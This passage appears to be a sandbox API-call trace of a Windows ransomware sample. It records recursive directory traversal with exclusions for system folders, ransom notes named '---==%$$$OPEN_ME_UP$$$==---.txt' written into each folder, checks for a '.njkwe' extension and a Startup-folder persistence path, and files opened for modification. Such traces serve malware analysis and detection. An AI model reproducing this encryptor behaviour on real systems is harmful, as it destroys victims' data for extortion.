lpString2="System Volume Information") returned -1 [0072.843] lstrcmpiW (lpString1="PaidWiFi", lpString2="Program Files") returned -1 [0072.843] lstrcmpiW (lpString1="PaidWiFi", lpString2="Program Files (x86)") returned -1 [0072.844] wnsprintfW (in: pszDest=0xc0e158, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\DataMart\\PaidWiFi") returned 46 [0072.844] lstrcmpW (lpString1="PaidWiFi", lpString2=".") returned 1 [0072.844] lstrcmpW (lpString1="PaidWiFi", lpString2="..") returned 1 [0072.844] lstrcmpW (lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\DataMart\\PaidWiFi", lpString2="C:\\Users\\FD1HVy\\Desktop") returned -1 [0072.844] GetProcessHeap () returned 0xbe0000 [0072.844] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc29660 [0072.844] wnsprintfW (in: pszDest=0xc29660, cchDest=512, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\DataMart\\PaidWiFi\\*") returned 48 [0072.844] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\DataMart\\PaidWiFi\\*", lpFindFileData=0x380f310 | out: lpFindFileData=0x380f310*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17c6f037, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xbd4bb986, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x17c6f037, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName=".", cAlternateFileName="")) returned 0xc19d20 [0072.844] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0072.844] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0072.844] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0072.844] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0072.844] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0072.844] wnsprintfW (in: pszDest=0xc29660, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\DataMart\\PaidWiFi\\.") returned 48 [0072.844] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0072.844] FindNextFileW (in: hFindFile=0xc19d20, lpFindFileData=0x380f310 | out: lpFindFileData=0x380f310*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17c6f037, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xbd4bb986, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x17c6f037, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="..", cAlternateFileName="")) returned 1 [0072.844] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0072.844] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0072.844] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0072.844] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0072.844] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0072.844] wnsprintfW (in: pszDest=0xc29660, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\DataMart\\PaidWiFi\\..") returned 49 [0072.844] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0072.844] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0072.844] FindNextFileW (in: hFindFile=0xc19d20, lpFindFileData=0x380f310 | out: lpFindFileData=0x380f310*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17c6f037, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xbd4bb986, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x17c6f037, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="..", cAlternateFileName="")) returned 0 [0072.844] FindClose (in: hFindFile=0xc19d20 | out: hFindFile=0xc19d20) returned 1 [0072.844] wnsprintfW (in: pszDest=0xc29660, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\DataMart\\PaidWiFi\\---==%$$$OPEN_ME_UP$$$==---.txt") returned 78 [0072.844] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\DataMart\\PaidWiFi\\---==%$$$OPEN_ME_UP$$$==---.txt" (normalized: "c:\\programdata\\microsoft\\datamart\\paidwifi\\---==%$$$open_me_up$$$==---.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x430 [0072.846] WriteFile (in: hFile=0x430, lpBuffer=0x406478*, nNumberOfBytesToWrite=0x351, lpNumberOfBytesWritten=0x380f2dc, lpOverlapped=0x0 | out: lpBuffer=0x406478*, lpNumberOfBytesWritten=0x380f2dc*=0x351, lpOverlapped=0x0) returned 1 [0072.847] CloseHandle (hObject=0x430) returned 1 [0072.847] GetProcessHeap () returned 0xbe0000 [0072.847] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc29660 | out: hHeap=0xbe0000) returned 1 [0072.847] FindNextFileW (in: hFindFile=0xc1a160, lpFindFileData=0x380f598 | out: lpFindFileData=0x380f598*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17c6f037, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xbd4bb986, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x17c6f037, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="PaidWiFi", cAlternateFileName="")) returned 0 [0072.847] FindClose (in: hFindFile=0xc1a160 | out: hFindFile=0xc1a160) returned 1 [0072.847] wnsprintfW (in: pszDest=0xc0e158, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\DataMart\\---==%$$$OPEN_ME_UP$$$==---.txt") returned 69 [0072.847] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\DataMart\\---==%$$$OPEN_ME_UP$$$==---.txt" (normalized: "c:\\programdata\\microsoft\\datamart\\---==%$$$open_me_up$$$==---.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x42c [0072.847] WriteFile (in: hFile=0x42c, lpBuffer=0x406478*, nNumberOfBytesToWrite=0x351, lpNumberOfBytesWritten=0x380f564, lpOverlapped=0x0 | out: lpBuffer=0x406478*, lpNumberOfBytesWritten=0x380f564*=0x351, lpOverlapped=0x0) returned 1 [0072.848] CloseHandle (hObject=0x42c) returned 1 [0072.848] GetProcessHeap () returned 0xbe0000 [0072.848] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc0e158 | out: hHeap=0xbe0000) returned 1 [0072.848] FindNextFileW (in: hFindFile=0xc19fa0, lpFindFileData=0x380f820 | out: lpFindFileData=0x380f820*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17c6f037, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xbd4bc8c7, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x17c95299, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="Device Stage", cAlternateFileName="DEVICE~1")) returned 1 [0072.849] lstrcmpiW (lpString1="Device Stage", lpString2="Windows") returned -1 [0072.849] lstrcmpiW (lpString1="Device Stage", lpString2="$Recycle.bin") returned 1 [0072.849] lstrcmpiW (lpString1="Device Stage", lpString2="System Volume Information") returned -1 [0072.849] lstrcmpiW (lpString1="Device Stage", lpString2="Program Files") returned -1 [0072.849] lstrcmpiW (lpString1="Device Stage", lpString2="Program Files (x86)") returned -1 [0072.849] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage") returned 41 [0072.849] lstrcmpW (lpString1="Device Stage", lpString2=".") returned 1 [0072.849] lstrcmpW (lpString1="Device Stage", lpString2="..") returned 1 [0072.849] lstrcmpW (lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage", lpString2="C:\\Users\\FD1HVy\\Desktop") returned -1 [0072.849] GetProcessHeap () returned 0xbe0000 [0072.849] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc0e158 [0072.849] wnsprintfW (in: pszDest=0xc0e158, cchDest=512, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\*") returned 43 [0072.849] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\*", lpFindFileData=0x380f598 | out: lpFindFileData=0x380f598*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17c6f037, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xbd4bc8c7, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x17c95299, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName=".", cAlternateFileName="")) returned 0xc19ce0 [0072.849] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0072.849] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0072.849] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0072.849] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0072.849] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0072.849] wnsprintfW (in: pszDest=0xc0e158, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\.") returned 43 [0072.849] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0072.849] FindNextFileW (in: hFindFile=0xc19ce0, lpFindFileData=0x380f598 | out: lpFindFileData=0x380f598*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17c6f037, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xbd4bc8c7, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x17c95299, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="..", cAlternateFileName="")) returned 1 [0072.849] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0072.849] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0072.849] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0072.849] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0072.849] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0072.849] wnsprintfW (in: pszDest=0xc0e158, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\..") returned 44 [0072.849] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0072.849] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0072.849] FindNextFileW (in: hFindFile=0xc19ce0, lpFindFileData=0x380f598 | out: lpFindFileData=0x380f598*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17c6f037, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xbd4bd6f2, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x17c95299, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="Device", cAlternateFileName="")) returned 1 [0072.849] lstrcmpiW (lpString1="Device", lpString2="Windows") returned -1 [0072.849] lstrcmpiW (lpString1="Device", lpString2="$Recycle.bin") returned 1 [0072.850] lstrcmpiW (lpString1="Device", lpString2="System Volume Information") returned -1 [0072.850] lstrcmpiW (lpString1="Device", lpString2="Program Files") returned -1 [0072.850] lstrcmpiW (lpString1="Device", lpString2="Program Files (x86)") returned -1 [0072.850] wnsprintfW (in: pszDest=0xc0e158, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device") returned 48 [0072.850] lstrcmpW (lpString1="Device", lpString2=".") returned 1 [0072.850] lstrcmpW (lpString1="Device", lpString2="..") returned 1 [0072.850] lstrcmpW (lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device", lpString2="C:\\Users\\FD1HVy\\Desktop") returned -1 [0072.850] GetProcessHeap () returned 0xbe0000 [0072.850] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc29660 [0072.850] wnsprintfW (in: pszDest=0xc29660, cchDest=512, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device\\*") returned 50 [0072.850] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device\\*", lpFindFileData=0x380f310 | out: lpFindFileData=0x380f310*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17c6f037, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xbd4bd6f2, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x17c95299, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName=".", cAlternateFileName="")) returned 0xc1a2a0 [0072.850] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0072.850] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0072.850] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0072.851] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0072.851] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0072.851] wnsprintfW (in: pszDest=0xc29660, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device\\.") returned 50 [0072.851] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0072.851] FindNextFileW (in: hFindFile=0xc1a2a0, lpFindFileData=0x380f310 | out: lpFindFileData=0x380f310*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17c6f037, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xbd4bd6f2, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x17c95299, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="..", cAlternateFileName="")) returned 1 [0072.851] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0072.851] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0072.851] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0072.851] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0072.851] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0072.851] wnsprintfW (in: pszDest=0xc29660, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device\\..") returned 51 [0072.851] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0072.851] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0072.851] FindNextFileW (in: hFindFile=0xc1a2a0, lpFindFileData=0x380f310 | out: lpFindFileData=0x380f310*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17c95299, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xbd55373b, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a8653f0, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="{113527a4-45d4-4b6f-b567-97838f1b04b0}", cAlternateFileName="{11352~1")) returned 1 [0072.851] lstrcmpiW (lpString1="{113527a4-45d4-4b6f-b567-97838f1b04b0}", lpString2="Windows") returned -1 [0072.851] lstrcmpiW (lpString1="{113527a4-45d4-4b6f-b567-97838f1b04b0}", lpString2="$Recycle.bin") returned 1 [0072.851] lstrcmpiW (lpString1="{113527a4-45d4-4b6f-b567-97838f1b04b0}", lpString2="System Volume Information") returned -1 [0072.851] lstrcmpiW (lpString1="{113527a4-45d4-4b6f-b567-97838f1b04b0}", lpString2="Program Files") returned -1 [0072.851] lstrcmpiW (lpString1="{113527a4-45d4-4b6f-b567-97838f1b04b0}", lpString2="Program Files (x86)") returned -1 [0072.851] wnsprintfW (in: pszDest=0xc29660, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}") returned 87 [0072.851] lstrcmpW (lpString1="{113527a4-45d4-4b6f-b567-97838f1b04b0}", lpString2=".") returned 1 [0072.851] lstrcmpW (lpString1="{113527a4-45d4-4b6f-b567-97838f1b04b0}", lpString2="..") returned 1 [0072.851] lstrcmpW (lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}", lpString2="C:\\Users\\FD1HVy\\Desktop") returned -1 [0072.851] GetProcessHeap () returned 0xbe0000 [0072.851] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc16310 [0072.851] wnsprintfW (in: pszDest=0xc16310, cchDest=512, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\*") returned 89 [0072.851] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\*", lpFindFileData=0x380f088 | out: lpFindFileData=0x380f088*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17c95299, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xbd55373b, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a8653f0, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName=".", cAlternateFileName="")) returned 0xc19ca0 [0072.853] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0072.853] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0072.853] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0072.853] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0072.853] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0072.853] wnsprintfW (in: pszDest=0xc16310, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\.") returned 89 [0072.853] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0072.853] FindNextFileW (in: hFindFile=0xc19ca0, lpFindFileData=0x380f088 | out: lpFindFileData=0x380f088*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17c95299, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xbd55373b, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a8653f0, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="..", cAlternateFileName="")) returned 1 [0072.853] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0072.853] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0072.853] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0072.853] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0072.853] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0072.853] wnsprintfW (in: pszDest=0xc16310, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\..") returned 90 [0072.853] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0072.853] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0072.853] FindNextFileW (in: hFindFile=0xc19ca0, lpFindFileData=0x380f088 | out: lpFindFileData=0x380f088*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x62062b13, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x62062b13, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x62062b13, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x1fad1, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="background.png", cAlternateFileName="")) returned 1 [0072.853] lstrcmpiW (lpString1="background.png", lpString2="Windows") returned -1 [0072.853] lstrcmpiW (lpString1="background.png", lpString2="$Recycle.bin") returned 1 [0072.853] lstrcmpiW (lpString1="background.png", lpString2="System Volume Information") returned -1 [0072.853] lstrcmpiW (lpString1="background.png", lpString2="Program Files") returned -1 [0072.853] lstrcmpiW (lpString1="background.png", lpString2="Program Files (x86)") returned -1 [0072.853] wnsprintfW (in: pszDest=0xc16310, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\background.png") returned 102 [0072.853] StrStrIW (lpFirst="background.png", lpSrch=".njkwe") returned 0x0 [0072.853] lstrcmpW (lpString1="background.png", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0072.854] lstrcmpW (lpString1="background.png", lpString2="taridd") returned -1 [0072.854] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\background.png", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0072.854] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\background.png" (normalized: "c:\\programdata\\microsoft\\device stage\\device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\background.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0072.855] FindNextFileW (in: hFindFile=0xc19ca0, lpFindFileData=0x380f088 | out: lpFindFileData=0x380f088*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x62062b13, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x62062b13, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x62062b13, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0xb61, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="behavior.xml", cAlternateFileName="")) returned 1 [0072.855] lstrcmpiW (lpString1="behavior.xml", lpString2="Windows") returned -1 [0072.855] lstrcmpiW (lpString1="behavior.xml", lpString2="$Recycle.bin") returned 1 [0072.855] lstrcmpiW (lpString1="behavior.xml", lpString2="System Volume Information") returned -1 [0072.855] lstrcmpiW (lpString1="behavior.xml", lpString2="Program Files") returned -1 [0072.855] lstrcmpiW (lpString1="behavior.xml", lpString2="Program Files (x86)") returned -1 [0072.855] wnsprintfW (in: pszDest=0xc16310, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\behavior.xml") returned 100 [0072.855] StrStrIW (lpFirst="behavior.xml", lpSrch=".njkwe") returned 0x0 [0072.855] lstrcmpW (lpString1="behavior.xml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0072.855] lstrcmpW (lpString1="behavior.xml", lpString2="taridd") returned -1 [0072.855] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\behavior.xml", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0072.855] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\behavior.xml" (normalized: "c:\\programdata\\microsoft\\device stage\\device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\behavior.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0072.856] FindNextFileW (in: hFindFile=0xc19ca0, lpFindFileData=0x380f088 | out: lpFindFileData=0x380f088*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x62062b13, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x62062b13, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x62062b13, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0xadc8, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="device.png", cAlternateFileName="")) returned 1 [0072.856] lstrcmpiW (lpString1="device.png", lpString2="Windows") returned -1 [0072.856] lstrcmpiW (lpString1="device.png", lpString2="$Recycle.bin") returned 1 [0072.856] lstrcmpiW (lpString1="device.png", lpString2="System Volume Information") returned -1 [0072.856] lstrcmpiW (lpString1="device.png", lpString2="Program Files") returned -1 [0072.856] lstrcmpiW (lpString1="device.png", lpString2="Program Files (x86)") returned -1 [0072.856] wnsprintfW (in: pszDest=0xc16310, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\device.png") returned 98 [0072.856] StrStrIW (lpFirst="device.png", lpSrch=".njkwe") returned 0x0 [0072.856] lstrcmpW (lpString1="device.png", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0072.856] lstrcmpW (lpString1="device.png", lpString2="taridd") returned -1 [0072.856] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\device.png", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0072.856] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\device.png" (normalized: "c:\\programdata\\microsoft\\device stage\\device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\device.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0072.857] FindNextFileW (in: hFindFile=0xc19ca0, lpFindFileData=0x380f088 | out: lpFindFileData=0x380f088*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x62088d76, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x62088d76, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x62088d76, ftLastWriteTime.dwHighDateTime=0x1d2a02a, 